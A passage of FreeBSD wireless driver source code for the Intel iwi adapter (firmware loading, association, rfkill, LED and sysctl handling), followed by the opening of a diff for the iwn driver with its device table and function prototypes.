"Start" : "Join", assoc->bssid, ":", assoc->dst, ":", assoc->chan, le16toh(assoc->policy), assoc->auth, le16toh(assoc->capinfo), le16toh(assoc->lintval), le16toh(assoc->intval))); error = iwi_cmd(sc, IWI_CMD_ASSOCIATE, assoc, sizeof *assoc); done: ieee80211_free_node(ni); if (error) IWI_STATE_END(sc, IWI_FW_ASSOCIATING); return (error); } static void iwi_disassoc(void *arg, int pending) { struct iwi_softc *sc = arg; IWI_LOCK_DECL; IWI_LOCK(sc); iwi_disassociate(sc, 0); IWI_UNLOCK(sc); } static int iwi_disassociate(struct iwi_softc *sc, int quiet) { struct iwi_associate *assoc = &sc->assoc; if ((sc->flags & IWI_FLAG_ASSOCIATED) == 0) { DPRINTF(("Not associated\n")); return (-1); } IWI_STATE_BEGIN(sc, IWI_FW_DISASSOCIATING); if (quiet) assoc->type = IWI_HC_DISASSOC_QUIET; else assoc->type = IWI_HC_DISASSOC; DPRINTF(("Trying to disassociate from %6D channel %u\n", assoc->bssid, ":", assoc->chan)); return iwi_cmd(sc, IWI_CMD_ASSOCIATE, assoc, sizeof *assoc); } /* * release dma resources for the firmware */ static void iwi_release_fw_dma(struct iwi_softc *sc) { if (sc->fw_flags & IWI_FW_HAVE_PHY) bus_dmamap_unload(sc->fw_dmat, sc->fw_map); if (sc->fw_flags & IWI_FW_HAVE_MAP) bus_dmamem_free(sc->fw_dmat, sc->fw_virtaddr, sc->fw_map); if (sc->fw_flags & IWI_FW_HAVE_DMAT) bus_dma_tag_destroy(sc->fw_dmat); sc->fw_flags = 0; sc->fw_dma_size = 0; sc->fw_dmat = NULL; sc->fw_map = NULL; sc->fw_physaddr = 0; sc->fw_virtaddr = NULL; } /* * allocate the dma descriptor for the firmware. * Return 0 on success, 1 on error. * Must be called unlocked, protected by IWI_FLAG_FW_LOADING. */ static int iwi_init_fw_dma(struct iwi_softc *sc, int size) { if (sc->fw_dma_size >= size) return 0; if (bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), 4, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, size, 1, size, 0, NULL, NULL, &sc->fw_dmat) != 0) { device_printf(sc->sc_dev, "could not create firmware DMA tag\n"); goto error; } sc->fw_flags |= IWI_FW_HAVE_DMAT; if (bus_dmamem_alloc(sc->fw_dmat, &sc->fw_virtaddr, 0, &sc->fw_map) != 0) { device_printf(sc->sc_dev, "could not allocate firmware DMA memory\n"); goto error; } sc->fw_flags |= IWI_FW_HAVE_MAP; if (bus_dmamap_load(sc->fw_dmat, sc->fw_map, sc->fw_virtaddr, size, iwi_dma_map_addr, &sc->fw_physaddr, 0) != 0) { device_printf(sc->sc_dev, "could not load firmware DMA map\n"); goto error; } sc->fw_flags |= IWI_FW_HAVE_PHY; sc->fw_dma_size = size; return 0; error: iwi_release_fw_dma(sc); return 1; } static void iwi_init_locked(struct iwi_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct iwi_rx_data *data; int i; IWI_LOCK_ASSERT(sc); if (sc->fw_state == IWI_FW_LOADING) { device_printf(sc->sc_dev, "%s: already loading\n", __func__); return; /* XXX: condvar? 
*/ } iwi_stop_locked(sc); IWI_STATE_BEGIN(sc, IWI_FW_LOADING); if (iwi_reset(sc) != 0) { device_printf(sc->sc_dev, "could not reset adapter\n"); goto fail; } if (iwi_load_firmware(sc, &sc->fw_boot) != 0) { device_printf(sc->sc_dev, "could not load boot firmware %s\n", sc->fw_boot.name); goto fail; } if (iwi_load_ucode(sc, &sc->fw_uc) != 0) { device_printf(sc->sc_dev, "could not load microcode %s\n", sc->fw_uc.name); goto fail; } iwi_stop_master(sc); CSR_WRITE_4(sc, IWI_CSR_CMD_BASE, sc->cmdq.physaddr); CSR_WRITE_4(sc, IWI_CSR_CMD_SIZE, sc->cmdq.count); CSR_WRITE_4(sc, IWI_CSR_CMD_WIDX, sc->cmdq.cur); CSR_WRITE_4(sc, IWI_CSR_TX1_BASE, sc->txq[0].physaddr); CSR_WRITE_4(sc, IWI_CSR_TX1_SIZE, sc->txq[0].count); CSR_WRITE_4(sc, IWI_CSR_TX1_WIDX, sc->txq[0].cur); CSR_WRITE_4(sc, IWI_CSR_TX2_BASE, sc->txq[1].physaddr); CSR_WRITE_4(sc, IWI_CSR_TX2_SIZE, sc->txq[1].count); CSR_WRITE_4(sc, IWI_CSR_TX2_WIDX, sc->txq[1].cur); CSR_WRITE_4(sc, IWI_CSR_TX3_BASE, sc->txq[2].physaddr); CSR_WRITE_4(sc, IWI_CSR_TX3_SIZE, sc->txq[2].count); CSR_WRITE_4(sc, IWI_CSR_TX3_WIDX, sc->txq[2].cur); CSR_WRITE_4(sc, IWI_CSR_TX4_BASE, sc->txq[3].physaddr); CSR_WRITE_4(sc, IWI_CSR_TX4_SIZE, sc->txq[3].count); CSR_WRITE_4(sc, IWI_CSR_TX4_WIDX, sc->txq[3].cur); for (i = 0; i < sc->rxq.count; i++) { data = &sc->rxq.data[i]; CSR_WRITE_4(sc, data->reg, data->physaddr); } CSR_WRITE_4(sc, IWI_CSR_RX_WIDX, sc->rxq.count - 1); if (iwi_load_firmware(sc, &sc->fw_fw) != 0) { device_printf(sc->sc_dev, "could not load main firmware %s\n", sc->fw_fw.name); goto fail; } sc->flags |= IWI_FLAG_FW_INITED; IWI_STATE_END(sc, IWI_FW_LOADING); if (iwi_config(sc) != 0) { device_printf(sc->sc_dev, "unable to enable adapter\n"); goto fail2; } callout_reset(&sc->sc_wdtimer, hz, iwi_watchdog, sc); ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; ifp->if_drv_flags |= IFF_DRV_RUNNING; return; fail: IWI_STATE_END(sc, IWI_FW_LOADING); fail2: iwi_stop_locked(sc); } static void iwi_init(void *priv) { struct iwi_softc *sc = priv; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; IWI_LOCK_DECL; IWI_LOCK(sc); iwi_init_locked(sc); IWI_UNLOCK(sc); if (ifp->if_drv_flags & IFF_DRV_RUNNING) ieee80211_start_all(ic); } static void iwi_stop_locked(void *priv) { struct iwi_softc *sc = priv; struct ifnet *ifp = sc->sc_ifp; IWI_LOCK_ASSERT(sc); ifp->if_drv_flags &= ~(IFF_DRV_RUNNING | IFF_DRV_OACTIVE); if (sc->sc_softled) { callout_stop(&sc->sc_ledtimer); sc->sc_blinking = 0; } callout_stop(&sc->sc_wdtimer); callout_stop(&sc->sc_rftimer); iwi_stop_master(sc); CSR_WRITE_4(sc, IWI_CSR_RST, IWI_RST_SOFT_RESET); /* reset rings */ iwi_reset_cmd_ring(sc, &sc->cmdq); iwi_reset_tx_ring(sc, &sc->txq[0]); iwi_reset_tx_ring(sc, &sc->txq[1]); iwi_reset_tx_ring(sc, &sc->txq[2]); iwi_reset_tx_ring(sc, &sc->txq[3]); iwi_reset_rx_ring(sc, &sc->rxq); sc->sc_tx_timer = 0; sc->sc_state_timer = 0; sc->sc_busy_timer = 0; sc->flags &= ~(IWI_FLAG_BUSY | IWI_FLAG_ASSOCIATED); sc->fw_state = IWI_FW_IDLE; wakeup(sc); } static void iwi_stop(struct iwi_softc *sc) { IWI_LOCK_DECL; IWI_LOCK(sc); iwi_stop_locked(sc); IWI_UNLOCK(sc); } static void iwi_restart(void *arg, int npending) { struct iwi_softc *sc = arg; iwi_init(sc); } /* * Return whether or not the radio is enabled in hardware * (i.e. the rfkill switch is "off"). 
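* (Note the inverted sense of the return value: the routine actually returns nonzero when the switch is engaged and the radio is disabled, which is why callers test !iwi_getrfkill() for "radio on".)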
*/ static int iwi_getrfkill(struct iwi_softc *sc) { return (CSR_READ_4(sc, IWI_CSR_IO) & IWI_IO_RADIO_ENABLED) == 0; } static void iwi_radio_on(void *arg, int pending) { struct iwi_softc *sc = arg; struct ieee80211com *ic = sc->sc_ifp->if_l2com; device_printf(sc->sc_dev, "radio turned on\n"); iwi_init(sc); ieee80211_notify_radio(ic, 1); } static void iwi_rfkill_poll(void *arg) { struct iwi_softc *sc = arg; IWI_LOCK_ASSERT(sc); /* * Check for a change in rfkill state. We get an * interrupt when a radio is disabled but not when * it is enabled so we must poll for the latter. */ if (!iwi_getrfkill(sc)) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; ieee80211_runtask(ic, &sc->sc_radiontask); return; } callout_reset(&sc->sc_rftimer, 2*hz, iwi_rfkill_poll, sc); } static void iwi_radio_off(void *arg, int pending) { struct iwi_softc *sc = arg; struct ieee80211com *ic = sc->sc_ifp->if_l2com; IWI_LOCK_DECL; device_printf(sc->sc_dev, "radio turned off\n"); ieee80211_notify_radio(ic, 0); IWI_LOCK(sc); iwi_stop_locked(sc); iwi_rfkill_poll(sc); IWI_UNLOCK(sc); } static int iwi_sysctl_stats(SYSCTL_HANDLER_ARGS) { struct iwi_softc *sc = arg1; uint32_t size, buf[128]; memset(buf, 0, sizeof buf); if (!(sc->flags & IWI_FLAG_FW_INITED)) return SYSCTL_OUT(req, buf, sizeof buf); size = min(CSR_READ_4(sc, IWI_CSR_TABLE0_SIZE), 128 - 1); CSR_READ_REGION_4(sc, IWI_CSR_TABLE0_BASE, &buf[1], size); return SYSCTL_OUT(req, buf, size); } static int iwi_sysctl_radio(SYSCTL_HANDLER_ARGS) { struct iwi_softc *sc = arg1; int val = !iwi_getrfkill(sc); return SYSCTL_OUT(req, &val, sizeof val); } /* * Add sysctl knobs. */ static void iwi_sysctlattach(struct iwi_softc *sc) { struct sysctl_ctx_list *ctx = device_get_sysctl_ctx(sc->sc_dev); struct sysctl_oid *tree = device_get_sysctl_tree(sc->sc_dev); SYSCTL_ADD_PROC(ctx, SYSCTL_CHILDREN(tree), OID_AUTO, "radio", CTLTYPE_INT | CTLFLAG_RD, sc, 0, iwi_sysctl_radio, "I", "radio transmitter switch state (0=off, 1=on)"); SYSCTL_ADD_PROC(ctx, SYSCTL_CHILDREN(tree), OID_AUTO, "stats", CTLTYPE_OPAQUE | CTLFLAG_RD, sc, 0, iwi_sysctl_stats, "S", "statistics"); sc->bluetooth = 0; SYSCTL_ADD_INT(ctx, SYSCTL_CHILDREN(tree), OID_AUTO, "bluetooth", CTLFLAG_RW, &sc->bluetooth, 0, "bluetooth coexistence"); sc->antenna = IWI_ANTENNA_AUTO; SYSCTL_ADD_INT(ctx, SYSCTL_CHILDREN(tree), OID_AUTO, "antenna", CTLFLAG_RW, &sc->antenna, 0, "antenna (0=auto)"); } /* * LED support. * * Different cards have different capabilities. Some have three * led's while others have only one. The linux ipw driver defines * led's for link state (associated or not), band (11a, 11g, 11b), * and for link activity. We use one led and vary the blink rate * according to the tx/rx traffic a la the ath driver. */ static __inline uint32_t iwi_toggle_event(uint32_t r) { return r &~ (IWI_RST_STANDBY | IWI_RST_GATE_ODMA | IWI_RST_GATE_IDMA | IWI_RST_GATE_ADMA); } static uint32_t iwi_read_event(struct iwi_softc *sc) { return MEM_READ_4(sc, IWI_MEM_EEPROM_EVENT); } static void iwi_write_event(struct iwi_softc *sc, uint32_t v) { MEM_WRITE_4(sc, IWI_MEM_EEPROM_EVENT, v); } static void iwi_led_done(void *arg) { struct iwi_softc *sc = arg; sc->sc_blinking = 0; } /* * Turn the activity LED off: flip the pin and then set a timer so no * update will happen for the specified duration. 
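* (The duration is sc_ledoff, which iwi_led_blink() below records before arming the timer; iwi_led_done() then clears sc_blinking.)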
*/ static void iwi_led_off(void *arg) { struct iwi_softc *sc = arg; uint32_t v; v = iwi_read_event(sc); v &= ~sc->sc_ledpin; iwi_write_event(sc, iwi_toggle_event(v)); callout_reset(&sc->sc_ledtimer, sc->sc_ledoff, iwi_led_done, sc); } /* * Blink the LED according to the specified on/off times. */ static void iwi_led_blink(struct iwi_softc *sc, int on, int off) { uint32_t v; v = iwi_read_event(sc); v |= sc->sc_ledpin; iwi_write_event(sc, iwi_toggle_event(v)); sc->sc_blinking = 1; sc->sc_ledoff = off; callout_reset(&sc->sc_ledtimer, on, iwi_led_off, sc); } static void iwi_led_event(struct iwi_softc *sc, int event) { #define N(a) (sizeof(a)/sizeof(a[0])) /* NB: on/off times from the Atheros NDIS driver, w/ permission */ static const struct { u_int rate; /* tx/rx iwi rate */ u_int16_t timeOn; /* LED on time (ms) */ u_int16_t timeOff; /* LED off time (ms) */ } blinkrates[] = { { IWI_RATE_OFDM54, 40, 10 }, { IWI_RATE_OFDM48, 44, 11 }, { IWI_RATE_OFDM36, 50, 13 }, { IWI_RATE_OFDM24, 57, 14 }, { IWI_RATE_OFDM18, 67, 16 }, { IWI_RATE_OFDM12, 80, 20 }, { IWI_RATE_DS11, 100, 25 }, { IWI_RATE_OFDM9, 133, 34 }, { IWI_RATE_OFDM6, 160, 40 }, { IWI_RATE_DS5, 200, 50 }, { 6, 240, 58 }, /* XXX 3Mb/s if it existed */ { IWI_RATE_DS2, 267, 66 }, { IWI_RATE_DS1, 400, 100 }, { 0, 500, 130 }, /* unknown rate/polling */ }; uint32_t txrate; int j = 0; /* XXX silence compiler */ sc->sc_ledevent = ticks; /* time of last event */ if (sc->sc_blinking) /* don't interrupt active blink */ return; switch (event) { case IWI_LED_POLL: j = N(blinkrates)-1; break; case IWI_LED_TX: /* read current transmission rate from adapter */ txrate = CSR_READ_4(sc, IWI_CSR_CURRENT_TX_RATE); if (blinkrates[sc->sc_txrix].rate != txrate) { for (j = 0; j < N(blinkrates)-1; j++) if (blinkrates[j].rate == txrate) break; sc->sc_txrix = j; } else j = sc->sc_txrix; break; case IWI_LED_RX: if (blinkrates[sc->sc_rxrix].rate != sc->sc_rxrate) { for (j = 0; j < N(blinkrates)-1; j++) if (blinkrates[j].rate == sc->sc_rxrate) break; sc->sc_rxrix = j; } else j = sc->sc_rxrix; break; } /* XXX beware of overflow */ iwi_led_blink(sc, (blinkrates[j].timeOn * hz) / 1000, (blinkrates[j].timeOff * hz) / 1000); #undef N } static int iwi_sysctl_softled(SYSCTL_HANDLER_ARGS) { struct iwi_softc *sc = arg1; int softled = sc->sc_softled; int error; error = sysctl_handle_int(oidp, &softled, 0, req); if (error || !req->newptr) return error; softled = (softled != 0); if (softled != sc->sc_softled) { if (softled) { uint32_t v = iwi_read_event(sc); v &= ~sc->sc_ledpin; iwi_write_event(sc, iwi_toggle_event(v)); } sc->sc_softled = softled; } return 0; } static void iwi_ledattach(struct iwi_softc *sc) { struct sysctl_ctx_list *ctx = device_get_sysctl_ctx(sc->sc_dev); struct sysctl_oid *tree = device_get_sysctl_tree(sc->sc_dev); sc->sc_blinking = 0; sc->sc_ledstate = 1; sc->sc_ledidle = (2700*hz)/1000; /* 2.7sec */ callout_init_mtx(&sc->sc_ledtimer, &sc->sc_mtx, 0); SYSCTL_ADD_PROC(ctx, SYSCTL_CHILDREN(tree), OID_AUTO, "softled", CTLTYPE_INT | CTLFLAG_RW, sc, 0, iwi_sysctl_softled, "I", "enable/disable software LED support"); SYSCTL_ADD_UINT(ctx, SYSCTL_CHILDREN(tree), OID_AUTO, "ledpin", CTLFLAG_RW, &sc->sc_ledpin, 0, "pin setting to turn activity LED on"); SYSCTL_ADD_UINT(ctx, SYSCTL_CHILDREN(tree), OID_AUTO, "ledidle", CTLFLAG_RW, &sc->sc_ledidle, 0, "idle time for inactivity LED (ticks)"); /* XXX for debugging */ SYSCTL_ADD_UINT(ctx, SYSCTL_CHILDREN(tree), OID_AUTO, "nictype", CTLFLAG_RD, &sc->sc_nictype, 0, "NIC type from EEPROM"); sc->sc_ledpin = IWI_RST_LED_ACTIVITY; 
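/* Software LED blinking on the activity pin is enabled by default; type-1 NICs switch to the "associated" pin below. */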
sc->sc_softled = 1; sc->sc_nictype = (iwi_read_prom_word(sc, IWI_EEPROM_NIC) >> 8) & 0xff; if (sc->sc_nictype == 1) { /* * NB: led's are reversed. */ sc->sc_ledpin = IWI_RST_LED_ASSOCIATED; } } static void iwi_scan_start(struct ieee80211com *ic) { /* ignore */ } static void iwi_set_channel(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct iwi_softc *sc = ifp->if_softc; if (sc->fw_state == IWI_FW_IDLE) iwi_setcurchan(sc, ic->ic_curchan->ic_ieee); } static void iwi_scan_curchan(struct ieee80211_scan_state *ss, unsigned long maxdwell) { struct ieee80211vap *vap = ss->ss_vap; struct ifnet *ifp = vap->iv_ic->ic_ifp; struct iwi_softc *sc = ifp->if_softc; IWI_LOCK_DECL; IWI_LOCK(sc); if (iwi_scanchan(sc, maxdwell, 0)) ieee80211_cancel_scan(vap); IWI_UNLOCK(sc); } static void iwi_scan_mindwell(struct ieee80211_scan_state *ss) { /* NB: don't try to abort scan; wait for firmware to finish */ } static void iwi_scan_end(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct iwi_softc *sc = ifp->if_softc; IWI_LOCK_DECL; IWI_LOCK(sc); sc->flags &= ~IWI_FLAG_CHANNEL_SCAN; /* NB: make sure we're still scanning */ if (sc->fw_state == IWI_FW_SCANNING) iwi_cmd(sc, IWI_CMD_ABORT_SCAN, NULL, 0); IWI_UNLOCK(sc); } diff --git a/sys/dev/iwn/if_iwn.c b/sys/dev/iwn/if_iwn.c index 175d4cab8534..1b77157fc9a1 100644 --- a/sys/dev/iwn/if_iwn.c +++ b/sys/dev/iwn/if_iwn.c @@ -1,8591 +1,8591 @@ /*- * Copyright (c) 2007-2009 Damien Bergamini * Copyright (c) 2008 Benjamin Close * Copyright (c) 2008 Sam Leffler, Errno Consulting * Copyright (c) 2011 Intel Corporation * Copyright (c) 2013 Cedric GROSS * Copyright (c) 2013 Adrian Chadd * * Permission to use, copy, modify, and distribute this software for any * purpose with or without fee is hereby granted, provided that the above * copyright notice and this permission notice appear in all copies. * * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. */ /* * Driver for Intel WiFi Link 4965 and 1000/5000/6000 Series 802.11 network * adapters. 
*/ #include __FBSDID("$FreeBSD$"); #include "opt_wlan.h" #include "opt_iwn.h" #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include struct iwn_ident { uint16_t vendor; uint16_t device; const char *name; }; static const struct iwn_ident iwn_ident_table[] = { { 0x8086, IWN_DID_6x05_1, "Intel Centrino Advanced-N 6205" }, { 0x8086, IWN_DID_1000_1, "Intel Centrino Wireless-N 1000" }, { 0x8086, IWN_DID_1000_2, "Intel Centrino Wireless-N 1000" }, { 0x8086, IWN_DID_6x05_2, "Intel Centrino Advanced-N 6205" }, { 0x8086, IWN_DID_6050_1, "Intel Centrino Advanced-N + WiMAX 6250" }, { 0x8086, IWN_DID_6050_2, "Intel Centrino Advanced-N + WiMAX 6250" }, { 0x8086, IWN_DID_x030_1, "Intel Centrino Wireless-N 1030" }, { 0x8086, IWN_DID_x030_2, "Intel Centrino Wireless-N 1030" }, { 0x8086, IWN_DID_x030_3, "Intel Centrino Advanced-N 6230" }, { 0x8086, IWN_DID_x030_4, "Intel Centrino Advanced-N 6230" }, { 0x8086, IWN_DID_6150_1, "Intel Centrino Wireless-N + WiMAX 6150" }, { 0x8086, IWN_DID_6150_2, "Intel Centrino Wireless-N + WiMAX 6150" }, { 0x8086, IWN_DID_2x00_1, "Intel(R) Centrino(R) Wireless-N 2200 BGN" }, { 0x8086, IWN_DID_2x00_2, "Intel(R) Centrino(R) Wireless-N 2200 BGN" }, /* XXX 2200D is IWN_SDID_2x00_4; there's no way to express this here! */ { 0x8086, IWN_DID_2x30_1, "Intel Centrino Wireless-N 2230" }, { 0x8086, IWN_DID_2x30_2, "Intel Centrino Wireless-N 2230" }, { 0x8086, IWN_DID_130_1, "Intel Centrino Wireless-N 130" }, { 0x8086, IWN_DID_130_2, "Intel Centrino Wireless-N 130" }, { 0x8086, IWN_DID_100_1, "Intel Centrino Wireless-N 100" }, { 0x8086, IWN_DID_100_2, "Intel Centrino Wireless-N 100" }, { 0x8086, IWN_DID_4965_1, "Intel Wireless WiFi Link 4965" }, { 0x8086, IWN_DID_6x00_1, "Intel Centrino Ultimate-N 6300" }, { 0x8086, IWN_DID_6x00_2, "Intel Centrino Advanced-N 6200" }, { 0x8086, IWN_DID_4965_2, "Intel Wireless WiFi Link 4965" }, { 0x8086, IWN_DID_4965_3, "Intel Wireless WiFi Link 4965" }, { 0x8086, IWN_DID_5x00_1, "Intel WiFi Link 5100" }, { 0x8086, IWN_DID_4965_4, "Intel Wireless WiFi Link 4965" }, { 0x8086, IWN_DID_5x00_3, "Intel Ultimate N WiFi Link 5300" }, { 0x8086, IWN_DID_5x00_4, "Intel Ultimate N WiFi Link 5300" }, { 0x8086, IWN_DID_5x00_2, "Intel WiFi Link 5100" }, { 0x8086, IWN_DID_6x00_3, "Intel Centrino Ultimate-N 6300" }, { 0x8086, IWN_DID_6x00_4, "Intel Centrino Advanced-N 6200" }, { 0x8086, IWN_DID_5x50_1, "Intel WiMAX/WiFi Link 5350" }, { 0x8086, IWN_DID_5x50_2, "Intel WiMAX/WiFi Link 5350" }, { 0x8086, IWN_DID_5x50_3, "Intel WiMAX/WiFi Link 5150" }, { 0x8086, IWN_DID_5x50_4, "Intel WiMAX/WiFi Link 5150" }, { 0x8086, IWN_DID_6035_1, "Intel Centrino Advanced 6235" }, { 0x8086, IWN_DID_6035_2, "Intel Centrino Advanced 6235" }, { 0, 0, NULL } }; static int iwn_probe(device_t); static int iwn_attach(device_t); static int iwn4965_attach(struct iwn_softc *, uint16_t); static int iwn5000_attach(struct iwn_softc *, uint16_t); static int iwn_config_specific(struct iwn_softc *, uint16_t); static void iwn_radiotap_attach(struct iwn_softc *); static void iwn_sysctlattach(struct iwn_softc *); static struct ieee80211vap *iwn_vap_create(struct ieee80211com *, const char [IFNAMSIZ], int, enum ieee80211_opmode, int, const uint8_t [IEEE80211_ADDR_LEN], const 
uint8_t [IEEE80211_ADDR_LEN]); static void iwn_vap_delete(struct ieee80211vap *); static int iwn_detach(device_t); static int iwn_shutdown(device_t); static int iwn_suspend(device_t); static int iwn_resume(device_t); static int iwn_nic_lock(struct iwn_softc *); static int iwn_eeprom_lock(struct iwn_softc *); static int iwn_init_otprom(struct iwn_softc *); static int iwn_read_prom_data(struct iwn_softc *, uint32_t, void *, int); static void iwn_dma_map_addr(void *, bus_dma_segment_t *, int, int); static int iwn_dma_contig_alloc(struct iwn_softc *, struct iwn_dma_info *, void **, bus_size_t, bus_size_t); static void iwn_dma_contig_free(struct iwn_dma_info *); static int iwn_alloc_sched(struct iwn_softc *); static void iwn_free_sched(struct iwn_softc *); static int iwn_alloc_kw(struct iwn_softc *); static void iwn_free_kw(struct iwn_softc *); static int iwn_alloc_ict(struct iwn_softc *); static void iwn_free_ict(struct iwn_softc *); static int iwn_alloc_fwmem(struct iwn_softc *); static void iwn_free_fwmem(struct iwn_softc *); static int iwn_alloc_rx_ring(struct iwn_softc *, struct iwn_rx_ring *); static void iwn_reset_rx_ring(struct iwn_softc *, struct iwn_rx_ring *); static void iwn_free_rx_ring(struct iwn_softc *, struct iwn_rx_ring *); static int iwn_alloc_tx_ring(struct iwn_softc *, struct iwn_tx_ring *, int); static void iwn_reset_tx_ring(struct iwn_softc *, struct iwn_tx_ring *); static void iwn_free_tx_ring(struct iwn_softc *, struct iwn_tx_ring *); static void iwn5000_ict_reset(struct iwn_softc *); static int iwn_read_eeprom(struct iwn_softc *, uint8_t macaddr[IEEE80211_ADDR_LEN]); static void iwn4965_read_eeprom(struct iwn_softc *); #ifdef IWN_DEBUG static void iwn4965_print_power_group(struct iwn_softc *, int); #endif static void iwn5000_read_eeprom(struct iwn_softc *); static uint32_t iwn_eeprom_channel_flags(struct iwn_eeprom_chan *); static void iwn_read_eeprom_band(struct iwn_softc *, int); static void iwn_read_eeprom_ht40(struct iwn_softc *, int); static void iwn_read_eeprom_channels(struct iwn_softc *, int, uint32_t); static struct iwn_eeprom_chan *iwn_find_eeprom_channel(struct iwn_softc *, struct ieee80211_channel *); static int iwn_setregdomain(struct ieee80211com *, struct ieee80211_regdomain *, int, struct ieee80211_channel[]); static void iwn_read_eeprom_enhinfo(struct iwn_softc *); static struct ieee80211_node *iwn_node_alloc(struct ieee80211vap *, const uint8_t mac[IEEE80211_ADDR_LEN]); static void iwn_newassoc(struct ieee80211_node *, int); static int iwn_media_change(struct ifnet *); static int iwn_newstate(struct ieee80211vap *, enum ieee80211_state, int); static void iwn_calib_timeout(void *); static void iwn_rx_phy(struct iwn_softc *, struct iwn_rx_desc *, struct iwn_rx_data *); static void iwn_rx_done(struct iwn_softc *, struct iwn_rx_desc *, struct iwn_rx_data *); static void iwn_rx_compressed_ba(struct iwn_softc *, struct iwn_rx_desc *, struct iwn_rx_data *); static void iwn5000_rx_calib_results(struct iwn_softc *, struct iwn_rx_desc *, struct iwn_rx_data *); static void iwn_rx_statistics(struct iwn_softc *, struct iwn_rx_desc *, struct iwn_rx_data *); static void iwn4965_tx_done(struct iwn_softc *, struct iwn_rx_desc *, struct iwn_rx_data *); static void iwn5000_tx_done(struct iwn_softc *, struct iwn_rx_desc *, struct iwn_rx_data *); static void iwn_tx_done(struct iwn_softc *, struct iwn_rx_desc *, int, uint8_t); static void iwn_ampdu_tx_done(struct iwn_softc *, int, int, int, void *); static void iwn_cmd_done(struct iwn_softc *, struct iwn_rx_desc *); static 
void iwn_notif_intr(struct iwn_softc *); static void iwn_wakeup_intr(struct iwn_softc *); static void iwn_rftoggle_intr(struct iwn_softc *); static void iwn_fatal_intr(struct iwn_softc *); static void iwn_intr(void *); static void iwn4965_update_sched(struct iwn_softc *, int, int, uint8_t, uint16_t); static void iwn5000_update_sched(struct iwn_softc *, int, int, uint8_t, uint16_t); #ifdef notyet static void iwn5000_reset_sched(struct iwn_softc *, int, int); #endif static int iwn_tx_data(struct iwn_softc *, struct mbuf *, struct ieee80211_node *); static int iwn_tx_data_raw(struct iwn_softc *, struct mbuf *, struct ieee80211_node *, const struct ieee80211_bpf_params *params); static int iwn_raw_xmit(struct ieee80211_node *, struct mbuf *, const struct ieee80211_bpf_params *); static void iwn_start(struct ifnet *); static void iwn_start_locked(struct ifnet *); static void iwn_watchdog(void *); static int iwn_ioctl(struct ifnet *, u_long, caddr_t); static int iwn_cmd(struct iwn_softc *, int, const void *, int, int); static int iwn4965_add_node(struct iwn_softc *, struct iwn_node_info *, int); static int iwn5000_add_node(struct iwn_softc *, struct iwn_node_info *, int); static int iwn_set_link_quality(struct iwn_softc *, struct ieee80211_node *); static int iwn_add_broadcast_node(struct iwn_softc *, int); static int iwn_updateedca(struct ieee80211com *); static void iwn_update_mcast(struct ifnet *); static void iwn_set_led(struct iwn_softc *, uint8_t, uint8_t, uint8_t); static int iwn_set_critical_temp(struct iwn_softc *); static int iwn_set_timing(struct iwn_softc *, struct ieee80211_node *); static void iwn4965_power_calibration(struct iwn_softc *, int); static int iwn4965_set_txpower(struct iwn_softc *, struct ieee80211_channel *, int); static int iwn5000_set_txpower(struct iwn_softc *, struct ieee80211_channel *, int); static int iwn4965_get_rssi(struct iwn_softc *, struct iwn_rx_stat *); static int iwn5000_get_rssi(struct iwn_softc *, struct iwn_rx_stat *); static int iwn_get_noise(const struct iwn_rx_general_stats *); static int iwn4965_get_temperature(struct iwn_softc *); static int iwn5000_get_temperature(struct iwn_softc *); static int iwn_init_sensitivity(struct iwn_softc *); static void iwn_collect_noise(struct iwn_softc *, const struct iwn_rx_general_stats *); static int iwn4965_init_gains(struct iwn_softc *); static int iwn5000_init_gains(struct iwn_softc *); static int iwn4965_set_gains(struct iwn_softc *); static int iwn5000_set_gains(struct iwn_softc *); static void iwn_tune_sensitivity(struct iwn_softc *, const struct iwn_rx_stats *); static void iwn_save_stats_counters(struct iwn_softc *, const struct iwn_stats *); static int iwn_send_sensitivity(struct iwn_softc *); static void iwn_check_rx_recovery(struct iwn_softc *, struct iwn_stats *); static int iwn_set_pslevel(struct iwn_softc *, int, int, int); static int iwn_send_btcoex(struct iwn_softc *); static int iwn_send_advanced_btcoex(struct iwn_softc *); static int iwn5000_runtime_calib(struct iwn_softc *); static int iwn_config(struct iwn_softc *); static uint8_t *ieee80211_add_ssid(uint8_t *, const uint8_t *, u_int); static int iwn_scan(struct iwn_softc *, struct ieee80211vap *, struct ieee80211_scan_state *, struct ieee80211_channel *); static int iwn_auth(struct iwn_softc *, struct ieee80211vap *vap); static int iwn_run(struct iwn_softc *, struct ieee80211vap *vap); static int iwn_ampdu_rx_start(struct ieee80211_node *, struct ieee80211_rx_ampdu *, int, int, int); static void iwn_ampdu_rx_stop(struct ieee80211_node *, 
